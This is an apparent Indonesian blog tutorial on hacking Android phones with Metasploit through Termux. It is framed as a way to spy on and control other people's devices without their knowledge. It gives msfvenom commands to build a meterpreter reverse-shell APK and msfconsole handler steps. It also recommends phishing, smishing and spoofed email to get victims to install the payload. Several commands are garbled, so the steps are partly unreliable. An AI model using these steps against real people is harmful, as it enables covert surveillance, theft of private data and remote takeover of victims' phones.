Cara Hack Android Dengan Metasploit 2024

Cara Hack Android dengan Metasploit
Cara Hack Android dengan Metasploit - Metasploit merupakan suatu proyek keamanan komputer untuk melakukan pengujian keamanan terhadap sebuah sistem.

Dengan begitu dapat menampilkan informasi kerentanan dan pengembangan signature IDS agar mengamankan software yang digunakan mengeksploitasi sistem.

Proyek ini mengembangkan source code yang memungkinkan untuk masuk ke jaringan sendiri dan mengindentifikasi resiko keamanan terhadap jaringan tersebut.

Banyak orang yang ingin tahu cara mengendalikan sebuah perangkat tanpa diketahui oleh korban, maka cara ini yang satu ini adalah solusinya.

Namun, tidak sedikit yang sudah mencoba cara ini karena sangat sulit dan membutuhkan ketelitian dan skill hacking.

Anda tenang saja, karena kami akan mengulasnya menjadi lebih mudah agar anda bisa mencobanya untuk melakukan penyadapan terhadap perangkat orang lain.

Jika anda penasaran, silahkan simak ulasan kali ini hingga akhir yang akan kita bahas mengenai cara hack Android dengan Metasploit.

Cara Hack Android dengan Metasploit

Cara Hack Android dengan Metasploit
Cara Hack Android dengan Metasploit
Seperti yang kita ketahui bahwa Metasploit dapat mengetahui informasi yang tersimpan pada perangkat yang dapat dengan mudah diambil tanpa sepengatahuan pemilik.

Ada dua langkah yang harus anda lakukan untuk bisa menyadap HP dengan Metasploit ini yang akan kita bahas lebih lanjut.

Adapun cara hack Android dengan Metasploit sebagai berikut:

1. Install Metasploit Termux Hack Android

Untuk menginstal Metasploit di termux ketik kode termux sadap HP berikut di aplikasi Termux yang ada di HPAndroid anda.

$ apt-get update
$ apt-get upgrade
$ apt-get install wget
$ cd Home
$ bash Metasploit.sh

2. Script Termux Hack Android

Setelah Metasploit berhasil diinstal, anda dapat memuat payloud Android dengan perintah kode Termux berikut di Termux anda.

msfvenom -p android/meterpreter/reverse_http lhost = "alamat IP Anda" 8080 r> "nama aplikasi".apk

  • lhost = alamat IP lokal Anda, Anda dapat memeriksa alamat IP Anda hanya dengan mengetik ipconfig di termux lalu tekan enter. Nantinya IP Anda akan muncul.
  • r> = beri nama nama aplikasi payloud dengan .apk untuk android (bebas dengan nama apapun)
Setelah anda selesai menginstall payloud, anda dapat memeriksa payload dengan mengetikkan perintah "Is" di aplikasi Termux.

Ketika anda telah berhasil membuat payload anda dapat memulai Metasploit listener untuk membuat sesi dengan Smartphone yang akan di hack, dengan ketik perintah berikut ini:

$ msfconsole
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_http
$ set lhost = (IP Anda)
$ set lport = 8080
$ exploit

Sekarang setelah dengan langkah di atas, anda harus mengirim payload yang sudah dibuat sebelumnya ke Android yang akan di hack..

Saat anda mengetik exploit, maka etasploit akan memulai koneksi dari ponsel anda setelah target menginstal di ponselnya sehingga anda akan mendapatkan koneksi dari target.

Selain itu anda juga bisa mengirim payload ke target dengan link phishing, spoofing email, smishing, dan social engineering.

Akhir Kata

Jika anda mendapatkan error saat menginstal Metasploit silahkan anda lebih teliti apakah terdapat langkah yang terlewat atau tidak.

Kebanyakan orang merasa sulit saat menginstal Metasploit atau memasangnya dengan terburu-buru sehingga ada langkah yang tidak diterapkan.

Perlu diperhatikan jika cara menyadap Android dengan Metasploit ini hanya sebagai informasi semata-mata hanya untuk menambah wawasan anda.

Demikian informasi yang dapat kami bagikan kepada anda mengenai cara hack Android dengan Metasploit pada artikel kali ini. Semoga bermanfaat dan selamat mencoba.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel